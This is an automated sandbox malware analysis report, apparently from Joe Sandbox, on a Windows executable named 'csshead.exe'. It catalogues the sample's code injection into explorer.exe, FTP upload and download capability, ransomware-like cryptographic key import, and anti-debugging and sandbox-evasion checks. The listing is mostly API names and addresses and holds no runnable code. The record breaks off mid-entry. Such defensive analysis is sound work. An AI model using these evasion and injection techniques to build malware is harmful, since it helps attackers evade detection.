Analysis Report

Overview

General Information

Joe Sandbox Version:23.0.0
Analysis ID:56303
Start time:15:34:04
Joe Sandbox Product:Cloud
Start date:03.07.2018
Overall analysis duration:0h 6m 22s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:csshead (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:W10 Native physical Machine for testing VM-aware malware (Office 2010, Java 1.8.0_91, Flash 22.0.0.192, Acrobat Reader DC 15.016.20039, Internet Explorer 11, Chrome 55, Firefox 50)
Number of new started processes analysed:2
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal76.evad.winEXE@3/0@0/0
HCA Information:
  • Successful, ratio: 74%
  • Number of executed functions: 106
  • Number of non-executed functions: 246
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 45.7% (good quality ratio 42.1%)
  • Quality average: 80.9%
  • Quality standard deviation: 30.5%
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time

Detection

Strategy  | Score | Range   | Reporting      | Detection
Threshold | 76    | 0 - 100 | Report FP / FN | malicious

Confidence

Strategy  | Score | Range | Further Analysis Required? | Confidence
Threshold | 5     | 0 - 5 | false                      |


Classification

Analysis Advice

Sample may offer command line options; please run it with the 'Execute binary with arguments' cookbook (it is possible that the command line switches require additional characters such as "-", "/" or "--").
Sample reads itself and does not show any behavior; it likely performs host environment checks that are compared against an embedded key.
Sample tries to load a library that is not present or installed on the analysis machine; adding the library might reveal more behavior.



Signature Overview

AV Detection:

Antivirus detection for unpacked file
Source: 0.2.csshead.exe.50000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 0.2.csshead.exe.400000.1.unpack | Avira: Label: HEUR/AGEN.1023574
Source: 0.0.csshead.exe.400000.0.unpack | Avira: Label: TR/Patched.Gen
Source: 1.2.explorer.exe.790000.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.explorer.exe.770000.1.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 0.1.csshead.exe.400000.0.unpack | Avira: Label: TR/Patched.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004017A2 CryptDecrypt,CryptDecrypt,0_2_004017A2
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0040153C CryptGenRandom,CryptGenRandom,0_2_0040153C
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401402 CryptHashData,CryptHashData,0_2_00401402
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004017A4 CryptDecrypt,CryptDecrypt,0_2_004017A4
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401AAE CryptEncrypt,CryptEncrypt,0_2_00401AAE
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004017E8 CryptAcquireContextA,CryptAcquireContextA,0_2_004017E8
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401574 CryptSetKeyParam,CryptSetKeyParam,0_2_00401574
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401AB0 CryptEncrypt,CryptEncrypt,0_2_00401AB0
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401374 CryptCreateHash,CryptCreateHash,0_2_00401374
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004018A0 CryptImportKey,CryptImportKey,0_2_004018A0
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004014D0 CryptDestroyHash,CryptDestroyHash,0_2_004014D0
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401490 CryptGetHashParam,CryptGetHashParam,0_2_00401490
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401404 CryptHashData,CryptHashData,0_2_00401404
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401AF8 CryptDestroyKey,CryptDestroyKey,0_2_00401AF8
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401B20 CryptReleaseContext,CryptReleaseContext,0_2_00401B20
Source: C:\Windows\explorer.exe | Code function: 1_2_007714D0 CryptDestroyHash,CryptDestroyHash,1_2_007714D0
Source: C:\Windows\explorer.exe | Code function: 1_2_00771404 CryptHashData,CryptHashData,1_2_00771404
Source: C:\Windows\explorer.exe | Code function: 1_2_00771AF8 CryptDestroyKey,CryptDestroyKey,1_2_00771AF8
Source: C:\Windows\explorer.exe | Code function: 1_2_00771402 CryptHashData,CryptHashData,1_2_00771402
Source: C:\Windows\explorer.exe | Code function: 1_2_00771574 CryptSetKeyParam,CryptSetKeyParam,1_2_00771574
Source: C:\Windows\explorer.exe | Code function: 1_2_00771AAE CryptEncrypt,CryptEncrypt,1_2_00771AAE
Source: C:\Windows\explorer.exe | Code function: 1_2_007717E8 CryptAcquireContextA,CryptAcquireContextA,1_2_007717E8
Source: C:\Windows\explorer.exe | Code function: 1_2_00771B20 CryptReleaseContext,CryptReleaseContext,1_2_00771B20
Source: C:\Windows\explorer.exe | Code function: 1_2_007717A2 CryptDecrypt,CryptDecrypt,1_2_007717A2
Source: C:\Windows\explorer.exe | Code function: 1_2_00771AB0 CryptEncrypt,CryptEncrypt,1_2_00771AB0
Source: C:\Windows\explorer.exe | Code function: 1_2_007718A0 CryptImportKey,CryptImportKey,1_2_007718A0
Source: C:\Windows\explorer.exe | Code function: 1_2_00771490 CryptGetHashParam,CryptGetHashParam,1_2_00771490
Source: C:\Windows\explorer.exe | Code function: 1_2_00771374 CryptCreateHash,CryptCreateHash,1_2_00771374
Source: C:\Windows\explorer.exe | Code function: 1_2_0077153C CryptGenRandom,CryptGenRandom,1_2_0077153C
Source: C:\Windows\explorer.exe | Code function: 1_2_007717A4 CryptDecrypt,CryptDecrypt,1_2_007717A4

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004018A0 CryptImportKey,CryptImportKey,0_2_004018A0
Source: C:\Windows\explorer.exe | Code function: 1_2_007718A0 CryptImportKey,CryptImportKey,1_2_007718A0

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\csshead.exe | Code function: 4x nop then pop ecx 0_2_00409178
Source: C:\Users\user\Desktop\csshead.exe | Code function: 4x nop then pop ecx 0_2_00409147
Source: C:\Windows\explorer.exe | Code function: 4x nop then pop ecx 1_2_00779147
Source: C:\Windows\explorer.exe | Code function: 4x nop then pop ecx 1_2_00779178

Networking:

Contains functionality to upload files via FTP
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00419D20 CoInitialize,NtdllDefWindowProc_A,GetCommandLineA,CreateMenu,LoadBitmapA,AppendMenuA,BeginDeferWindowPos,CreateMetaFileA,SetBrushOrgEx,LoadImageA,FtpPutFileEx,GetSysColorBrush,FrameRect,GlobalAlloc,GetLastError,GetIconInfo,GetIconInfo,mmioSetInfo,mmioAscend,GetSystemInfo,GetSystemTimeAsFileTime,SetConsoleCtrlHandler,CreateIoCompletionPort,CopyImage,DrawMenuBar,FindResourceA,VirtualAlloc,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,Loa 0_2_00419D20
Contains functionality to download additional files from the internet
Source: C:\Windows\explorer.exe | Code function: 1_2_007715B0 InternetReadFile,1_2_007715B0
Urls found in memory or binary data
Source: csshead.exe, explorer.exe | String found in binary or memory: https://

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401928 LoadLibraryA,GetProcAddress,0_2_00401928
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0040949C push 004094C8h; ret 0_2_004094C0
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004094E0 push 00409506h; ret 0_2_004094FE
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0040103C push 00401068h; ret 0_2_00401060
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0040107C push 004010A8h; ret 0_2_004010A0
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00429267 push ebx; ret 0_2_00429268
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00429F35 push ecx; ret 0_2_00429F48
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00432D21 pushfd ; retf 0043h 0_2_00432D22
Source: C:\Windows\explorer.exe | Code function: 1_2_0077949C push 007794C8h; ret 1_2_007794C0
Source: C:\Windows\explorer.exe | Code function: 1_2_007794E0 push 00779506h; ret 1_2_007794FE
Source: C:\Windows\explorer.exe | Code function: 1_2_0077103C push 00771068h; ret 1_2_00771060
Source: C:\Windows\explorer.exe | Code function: 1_2_0077107C push 007710A8h; ret 1_2_007710A0

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00403988 FindFirstFileA,FindClose,0_2_00403988
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00405640 SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405640
Source: C:\Windows\explorer.exe | Code function: 1_2_00775640 SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,1_2_00775640
Source: C:\Windows\explorer.exe | Code function: 1_2_00773988 FindFirstFileA,FindClose,1_2_00773988

System Summary:

Contains functionality to call native functions
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00404E94 NtQueryInformationProcess,ReadProcessMemory,0_2_00404E94
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00408A48 PostQuitMessage,NtdllDefWindowProc_A,0_2_00408A48
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00404DE0 NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,0_2_00404DE0
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00408A44 NtdllDefWindowProc_A,0_2_00408A44
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00419D20 CoInitialize,NtdllDefWindowProc_A,GetCommandLineA,CreateMenu,LoadBitmapA,AppendMenuA,BeginDeferWindowPos,CreateMetaFileA,SetBrushOrgEx,LoadImageA,FtpPutFileEx,GetSysColorBrush,FrameRect,GlobalAlloc,GetLastError,GetIconInfo,GetIconInfo,mmioSetInfo,mmioAscend,GetSystemInfo,GetSystemTimeAsFileTime,SetConsoleCtrlHandler,CreateIoCompletionPort,CopyImage,DrawMenuBar,FindResourceA,VirtualAlloc,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,Loa 0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00417E60 SetWindowLongA,NtdllDefWindowProc_A,0_2_00417E60
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00417ED0 SetWindowLongA,GetWindowLongA,OleUninitialize,OleInitialize,GetWindowTextLengthA,GetWindowTextA,SetWindowTextA,GlobalAlloc,GlobalFix,GlobalUnWire,lstrlen,SetWindowLongA,NtdllDefWindowProc_A,0_2_00417ED0
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00418190 SetWindowLongA,GetWindowLongA,OleUninitialize,OleInitialize,GetWindowTextLengthA,GetWindowTextA,SetWindowTextA,GlobalAlloc,GlobalFix,GlobalUnWire,SysFreeString,lstrlen,SysFreeString,SetWindowLongA,SysFreeString,NtdllDefWindowProc_A,0_2_00418190
Source: C:\Windows\explorer.exe | Code function: 1_2_00778A48 PostQuitMessage,NtdllDefWindowProc_A,1_2_00778A48
Source: C:\Windows\explorer.exe | Code function: 1_2_00774E94 NtQueryInformationProcess,ReadProcessMemory,1_2_00774E94
Source: C:\Windows\explorer.exe | Code function: 1_2_00778A44 NtdllDefWindowProc_A,1_2_00778A44
Source: C:\Windows\explorer.exe | Code function: 1_2_00774DE0 NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,1_2_00774DE0
Detected potential crypto function
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00405D20 0_2_00405D20
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00419D20 0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0041C95B 0_2_0041C95B
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0043256D 0_2_0043256D
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00430D58 0_2_00430D58
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00423AD0 0_2_00423AD0
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00430807 0_2_00430807
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004302B6 0_2_004302B6
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0042E76B 0_2_0042E76B
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_1_0041C95B 0_1_0041C95B
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_1_0043256D 0_1_0043256D
Source: C:\Windows\explorer.exe | Code function: 1_2_00775D20 1_2_00775D20
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\csshead.exe | Code function: String function: 00429EF0 appears 34 times
PE file contains strange resources
Source: csshead.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: csshead.exe | Binary or memory string: OriginalFilenametemplate.exeJ vs csshead.exe
Sample reads its own file content
Source: C:\Users\user\Desktop\csshead.exe | File read: C:\Users\user\Desktop\csshead.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\csshead.exe | Section loaded: open.dll
Classification label
Source: classification engine | Classification label: mal76.evad.winEXE@3/0@0/0
Contains functionality to instantiate COM classes
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_1_0041C95B EnumPrintersA,EnumPrintersA,OpenColorProfileA,OpenColorProfileA,EnumPrintersA,EnumPrintersA,LoadLibraryA,LoadIconA,LoadIconA,800001A3,800001A3,GetHGlobalFromStream,LoadLibraryA,LoadIconA,800001A3,GetHGlobalFromStream,EnumPrintersA,EnumPrintersA,GetDC,CreateEventA,GetClassLongA,SetClassLongA,GetCursorPos,GetCursorPos,CreateStreamOnHGlobal,CommDlgExtendedError,WaitForSingleObject,WaitNamedPipeA,CreateFileA,WaitNamedPipeA,CreateFileA,SetNamedPipeHandleState,CloseHandle,CloseHandle,WriteFile,ReadFile,WriteFile,CloseHandle,ReadFile,CloseHandle,LookupAccountNameA,LookupAccountNameA,GetLastError,GetLastError,GetLastError,GetLastError,LocalAlloc,LocalAlloc,GetLastError,LocalAlloc,GetLastError,LookupAccountNameA,GetLastError,LocalFree,SetStretchBltMode,SetStretchBltMode,SetAbortProc,DrawFrameControl,LoadImageA,SetWindowLongA,SetWindowLongA,CreateEventA,GetCursorPos,GetCursorPos,DragQueryFileA,GetNumberOfPhysicalMonitorsFromHMONITOR,CreateRectRgnIndirect,WaitForSingleObject,EnableMenuItem,CoInitializeEx,CoC 0_1_0041C95B
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00419D20 CoInitialize,NtdllDefWindowProc_A,GetCommandLineA,CreateMenu,LoadBitmapA,AppendMenuA,BeginDeferWindowPos,CreateMetaFileA,SetBrushOrgEx,LoadImageA,FtpPutFileEx,GetSysColorBrush,FrameRect,GlobalAlloc,GetLastError,GetIconInfo,GetIconInfo,mmioSetInfo,mmioAscend,GetSystemInfo,GetSystemTimeAsFileTime,SetConsoleCtrlHandler,CreateIoCompletionPort,CopyImage,DrawMenuBar,FindResourceA,VirtualAlloc,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,Loa 0_2_00419D20
Launches a second explorer.exe instance
Source: unknown | Process created: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\csshead.exe | Process created: C:\Windows\explorer.exe
Might use command line arguments
Source: C:\Users\user\Desktop\csshead.exe | Command line argument: Profile 0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe | Command line argument: <XC 0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe | Command line argument: DXC 0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe | Command line argument: .icm 0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe | Command line argument: (XC 0_2_00419D20
PE file has an executable .text section and no other executable section
Source: csshead.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads software policies
Source: C:\Users\user\Desktop\csshead.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\csshead.exe 'C:\Users\user\Desktop\csshead.exe'
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\csshead.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Binary contains paths to debug symbols
Source: Binary string: C:\As\Release\2000s.pdb source: csshead.exe

HIPS / PFW / Operating System Protection Evasion:

Injects code into the Windows Explorer (explorer.exe)
Source: C:\Users\user\Desktop\csshead.exe | Memory written: PID: 972 base: B0000 value: 43
Source: C:\Users\user\Desktop\csshead.exe | Memory written: PID: 972 base: 2431E8 value: 00
Source: C:\Users\user\Desktop\csshead.exe | Memory written: PID: 972 base: 12D46B0 value: 55
Writes to foreign memory regions
Source: C:\Users\user\Desktop\csshead.exe | Memory written: C:\Windows\explorer.exe base: 12D46B0
Contains functionality to add an ACL to a security descriptor
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00404406 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,0_2_00404406
Contains functionality to create a new security descriptor
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004041C8 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,AllocateAndInitializeSid,EqualSid,FreeSid,0_2_004041C8

Anti Debugging:

Found API chain indicative of debugger detection
Source: C:\Windows\explorer.exe | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep graph_1-5244
Source: C:\Users\user\Desktop\csshead.exe | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep graph_0-20617
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004010B4 rdtsc 0_2_004010B4
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00406D40 IsDebuggerPresent,0_2_00406D40
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004239DD VirtualProtect ?,-00000001,00000104,? 0_2_004239DD
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401928 LoadLibraryA,GetProcAddress,0_2_00401928
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004024F8 mov eax, dword ptr fs:[00000030h] 0_2_004024F8
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_01961560 mov eax, dword ptr fs:[00000030h] 0_2_01961560
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_01963134 mov eax, dword ptr fs:[00000030h] 0_2_01963134
Source: C:\Windows\explorer.exe | Code function: 1_2_007724F8 mov eax, dword ptr fs:[00000030h] 1_2_007724F8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401460 GetProcessHeap,RtlReAllocateHeap,0_2_00401460
Program does not show much activity (idle)
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Contains functionality to register its own exception handler
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0042CA48 SetUnhandledExceptionFilter,0_2_0042CA48
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00424FEB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00424FEB
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00429814 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00429814
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_1_0042CA48 SetUnhandledExceptionFilter,0_1_0042CA48

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00406B18 0_2_00406B18
Source: C:\Windows\explorer.exe | Code function: 1_2_00776B18 1_2_00776B18
Contains functionality to detect sleep reduction / modifications
Source: C:\Windows\explorer.exe | Code function: 1_2_00776DB0 GetTickCount,Sleep,GetTickCount,1_2_00776DB0
Source: C:\Windows\explorer.exe | Code function: 1_2_00776DC8 GetTickCount,Sleep,GetTickCount,1_2_00776DC8
Found evasive API chain (may execute only at specific dates)
Source: C:\Windows\explorer.exe | Evasive API call chain: GetSystemTime,DecisionNodes,Sleep graph_1-4754
Found stalling execution ending in API Sleep call
Source: C:\Windows\explorer.exe | Stalling execution: Execution stalls by calling Sleep graph_1-4543
Tries to detect sandboxes and other dynamic analysis tools (process name or module)
Source: csshead.exe, 00000000.00000002.16598505108.00594000.00000004.sdmp | Binary or memory string: SBIEDLL.DLL
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\csshead.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004010B4 rdtsc 0_2_004010B4
Found evasive API chain (date check)
Source: C:\Windows\explorer.exe | Evasive API call chain: GetSystemTime,DecisionNodes graph_1-4754
Found evasive API chain (may stop execution after accessing registry keys)
Source: C:\Windows\explorer.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_1-4677
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\Desktop\csshead.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_0-18809
Found evasive API chain checking for process token information
Source: C:\Users\user\Desktop\csshead.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_0-19037
Source: C:\Windows\explorer.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_1-4564
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 3852 | Thread sleep count: 75 > 30
Source: C:\Windows\explorer.exe TID: 3852 | Thread sleep time: -75000s >= -60000s
Program does not show much activity (idle)
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00403988 FindFirstFileA,FindClose,0_2_00403988
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00405640 SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405640
Source: C:\Windows\explorer.exe | Code function: 1_2_00775640 SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,1_2_00775640
Source: C:\Windows\explorer.exe | Code function: 1_2_00773988 FindFirstFileA,FindClose,1_2_00773988
Contains functionality to query system information
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00419D20 CoInitialize,NtdllDefWindowProc_A,GetCommandLineA,CreateMenu,LoadBitmapA,AppendMenuA,BeginDeferWindowPos,CreateMetaFileA,SetBrushOrgEx,LoadImageA,FtpPutFileEx,GetSysColorBrush,FrameRect,GlobalAlloc,GetLastError,GetIconInfo,GetIconInfo,mmioSetInfo,mmioAscend,GetSystemInfo,GetSystemTimeAsFileTime,SetConsoleCtrlHandler,CreateIoCompletionPort,CopyImage,DrawMenuBar,FindResourceA,VirtualAlloc,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,Loa 0_2_00419D20
Program exit points
Source: C:\Users\user\Desktop\csshead.exe | API call chain: ExitProcess graph end node graph_0-18811
Source: C:\Users\user\Desktop\csshead.exe | API call chain: ExitProcess graph end node graph_0-20649
Source: C:\Windows\explorer.exe | API call chain: ExitProcess graph end node graph_1-5197
Source: C:\Windows\explorer.exe | API call chain: ExitProcess graph end node graph_1-5140
Source: C:\Windows\explorer.exe | API call chain: ExitProcess graph end node graph_1-5566

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00420B80 GetWindowLongA,GetWindowLongA,IsWindowVisible,IsIconic,ShowWindow,GetWindowLongA,GetParent,0_2_00420B80

Lowering of HIPS / PFW / Operating System Security Settings:

May initialize a security null descriptor
Source: csshead.exe | Binary or memory string: S:(ML;;NRNWNX;;;LW)

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00406C6C cpuid 0_2_00406C6C
Queries device information via Setup API
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00406EEC LoadLibraryA,SetupDiGetClassDevsA,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyA,CharLowerBuffA,SetupDiDestroyDeviceInfoList,SetupDiGetClassDevsA,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyA,CharLowerBuffA,SetupDiDestroyDeviceInfoList,0_2_00406EEC
Queries the installation date of Windows
Source: C:\Users\user\Desktop\csshead.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the product ID of Windows
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Contains functionality to query local / system time
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00405468 GetSystemTime,0_2_00405468
Contains functionality to query the account / user name
